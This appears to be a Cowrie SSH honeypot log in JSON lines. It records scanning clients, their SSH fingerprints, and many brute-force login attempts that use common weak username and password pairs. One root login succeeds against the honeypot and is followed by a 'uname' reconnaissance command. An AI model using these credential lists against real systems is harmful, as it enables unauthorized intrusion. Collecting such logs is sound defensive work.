{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:28:40.115126Z","src_ip":"41.226.27.251","session":"4a7671840f0e"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"hadoop123","message":"login attempt [hadoop/hadoop123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:28:40.286706Z","src_ip":"41.226.27.251","session":"4a7671840f0e"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:28:41.512750Z","src_ip":"41.226.27.251","session":"4a7671840f0e"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:28:42.262192Z","src_ip":"212.227.235.229","session":"4faeaf351512"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:28:42.395004Z","src_ip":"212.227.235.229","session":"4faeaf351512"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"18.9","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 18.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:28:42.430019Z","src_ip":"212.227.235.229","session":"9a8398572f74"}
{"eventid":"cowrie.session.closed","duration":"84.3","message":"Connection lost after 84.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:28:42.443237Z","src_ip":"212.227.235.229","session":"9a8398572f74"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42582,"dst_ip":"1.2.3.4","dst_port":22,"session":"91c3ca55a8df","protocol":"ssh","message":"New connection: 212.227.235.229:42582 (1.2.3.4:22) [session: 91c3ca55a8df]","sensor":"my-vps","timestamp":"2025-08-31T03:28:42.495295Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T03:28:43.255474Z","src_ip":"212.227.235.229","session":"91c3ca55a8df"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T03:28:43.360021Z","src_ip":"212.227.235.229","session":"91c3ca55a8df"}
{"eventid":"cowrie.login.failed","username":"admin","password":"01021981","message":"login attempt [admin/01021981] failed","sensor":"my-vps","timestamp":"2025-08-31T03:28:43.864434Z","src_ip":"212.227.235.229","session":"91c3ca55a8df"}
{"eventid":"cowrie.login.failed","username":"admin","password":"01021976","message":"login attempt [admin/01021976] failed","sensor":"my-vps","timestamp":"2025-08-31T03:28:44.972301Z","src_ip":"212.227.235.229","session":"91c3ca55a8df"}
{"eventid":"cowrie.login.failed","username":"admin","password":"01011964","message":"login attempt [admin/01011964] failed","sensor":"my-vps","timestamp":"2025-08-31T03:28:46.080178Z","src_ip":"212.227.235.229","session":"91c3ca55a8df"}
{"eventid":"cowrie.login.failed","username":"admin","password":"0077","message":"login attempt [admin/0077] failed","sensor":"my-vps","timestamp":"2025-08-31T03:28:47.187585Z","src_ip":"212.227.235.229","session":"91c3ca55a8df"}
{"eventid":"cowrie.login.failed","username":"admin","password":"zzz123","message":"login attempt [admin/zzz123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:28:48.295230Z","src_ip":"212.227.235.229","session":"91c3ca55a8df"}
{"eventid":"cowrie.session.closed","duration":"6.9","message":"Connection lost after 6.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:28:49.402520Z","src_ip":"212.227.235.229","session":"91c3ca55a8df"}
{"eventid":"cowrie.login.failed","username":"www","password":"abc123","message":"login attempt [www/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:28:54.690634Z","src_ip":"212.227.125.160","session":"50c16d7d9aab"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":59538,"dst_ip":"1.2.3.4","dst_port":22,"session":"357fec4a8543","protocol":"ssh","message":"New connection: 41.226.27.251:59538 (1.2.3.4:22) [session: 357fec4a8543]","sensor":"my-vps","timestamp":"2025-08-31T03:29:00.218927Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:29:00.321039Z","src_ip":"41.226.27.251","session":"357fec4a8543"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:29:00.321894Z","src_ip":"41.226.27.251","session":"357fec4a8543"}
{"eventid":"cowrie.login.success","username":"root","password":"A123456a","message":"login attempt [root/A123456a] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:29:00.500944Z","src_ip":"41.226.27.251","session":"357fec4a8543"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:29:01.059171Z","src_ip":"41.226.27.251","session":"357fec4a8543"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T03:29:01.059924Z","src_ip":"41.226.27.251","session":"357fec4a8543"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:29:01.104125Z","src_ip":"41.226.27.251","session":"357fec4a8543"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:29:01.105253Z","src_ip":"41.226.27.251","session":"357fec4a8543"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":60498,"dst_ip":"1.2.3.4","dst_port":22,"session":"ce35bb9d9d73","protocol":"ssh","message":"New connection: 217.72.205.35:60498 (1.2.3.4:22) [session: ce35bb9d9d73]","sensor":"my-vps","timestamp":"2025-08-31T03:29:03.832767Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:29:03.834069Z","src_ip":"217.72.205.35","session":"ce35bb9d9d73"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47826,"dst_ip":"1.2.3.4","dst_port":22,"session":"cebc54a136cd","protocol":"ssh","message":"New connection: 212.227.235.229:47826 (1.2.3.4:22) [session: cebc54a136cd]","sensor":"my-vps","timestamp":"2025-08-31T03:29:05.134629Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:29:05.462629Z","src_ip":"212.227.235.229","session":"cebc54a136cd"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:29:05.463864Z","src_ip":"212.227.235.229","session":"cebc54a136cd"}
{"eventid":"cowrie.login.failed","username":"guest","password":"admin123","message":"login attempt [guest/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:29:10.786689Z","src_ip":"212.227.235.229","session":"cebc54a136cd"}
{"eventid":"cowrie.session.closed","duration":"7.6","message":"Connection lost after 7.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:29:12.714080Z","src_ip":"212.227.235.229","session":"cebc54a136cd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37618,"dst_ip":"1.2.3.4","dst_port":22,"session":"4309a30bd4d7","protocol":"ssh","message":"New connection: 212.227.125.160:37618 (1.2.3.4:22) [session: 4309a30bd4d7]","sensor":"my-vps","timestamp":"2025-08-31T03:29:16.604655Z"}
{"eventid":"cowrie.session.closed","duration":"95.5","message":"Connection lost after 95.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:29:17.459244Z","src_ip":"212.227.125.160","session":"50c16d7d9aab"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":42586,"dst_ip":"1.2.3.4","dst_port":22,"session":"32d9538ec94d","protocol":"ssh","message":"New connection: 41.226.27.251:42586 (1.2.3.4:22) [session: 32d9538ec94d]","sensor":"my-vps","timestamp":"2025-08-31T03:29:20.784633Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:29:20.785687Z","src_ip":"41.226.27.251","session":"32d9538ec94d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:29:20.828413Z","src_ip":"41.226.27.251","session":"32d9538ec94d"}
{"eventid":"cowrie.login.failed","username":"elasticsearch","password":"123456","message":"login attempt [elasticsearch/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T03:29:20.959688Z","src_ip":"41.226.27.251","session":"32d9538ec94d"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:29:22.210370Z","src_ip":"41.226.27.251","session":"32d9538ec94d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41016,"dst_ip":"1.2.3.4","dst_port":22,"session":"27ff609f416d","protocol":"ssh","message":"New connection: 212.227.125.160:41016 (1.2.3.4:22) [session: 27ff609f416d]","sensor":"my-vps","timestamp":"2025-08-31T03:29:26.518648Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:29:26.985326Z","src_ip":"212.227.125.160","session":"27ff609f416d"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:29:26.986505Z","src_ip":"212.227.125.160","session":"27ff609f416d"}
{"eventid":"cowrie.login.failed","username":"guest","password":"admin123","message":"login attempt [guest/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:29:28.528775Z","src_ip":"212.227.125.160","session":"27ff609f416d"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:29:29.898512Z","src_ip":"212.227.125.160","session":"27ff609f416d"}
{"eventid":"cowrie.session.closed","duration":"24.1","message":"Connection lost after 24.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:29:40.667931Z","src_ip":"212.227.125.160","session":"4309a30bd4d7"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":56184,"dst_ip":"1.2.3.4","dst_port":22,"session":"343a784c9fe1","protocol":"ssh","message":"New connection: 41.226.27.251:56184 (1.2.3.4:22) [session: 343a784c9fe1]","sensor":"my-vps","timestamp":"2025-08-31T03:29:40.999249Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:29:41.019104Z","src_ip":"41.226.27.251","session":"343a784c9fe1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:29:41.046512Z","src_ip":"41.226.27.251","session":"343a784c9fe1"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"ftp","message":"login attempt [ftp/ftp] failed","sensor":"my-vps","timestamp":"2025-08-31T03:29:41.233748Z","src_ip":"41.226.27.251","session":"343a784c9fe1"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:29:42.431898Z","src_ip":"41.226.27.251","session":"343a784c9fe1"}
{"eventid":"cowrie.login.failed","username":"www","password":"abc123","message":"login attempt [www/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:29:42.631294Z","src_ip":"212.227.235.229","session":"4faeaf351512"}
{"eventid":"cowrie.session.closed","duration":"82.9","message":"Connection lost after 82.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:29:46.217217Z","src_ip":"212.227.235.229","session":"4faeaf351512"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40074,"dst_ip":"1.2.3.4","dst_port":22,"session":"d9c007e7eb82","protocol":"ssh","message":"New connection: 212.227.235.229:40074 (1.2.3.4:22) [session: d9c007e7eb82]","sensor":"my-vps","timestamp":"2025-08-31T03:29:48.982039Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:29:48.982702Z","src_ip":"212.227.235.229","session":"d9c007e7eb82"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:29:49.229119Z","src_ip":"212.227.235.229","session":"d9c007e7eb82"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"P@ssw0rd","message":"login attempt [ftpuser/P@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-08-31T03:29:50.258403Z","src_ip":"212.227.235.229","session":"d9c007e7eb82"}
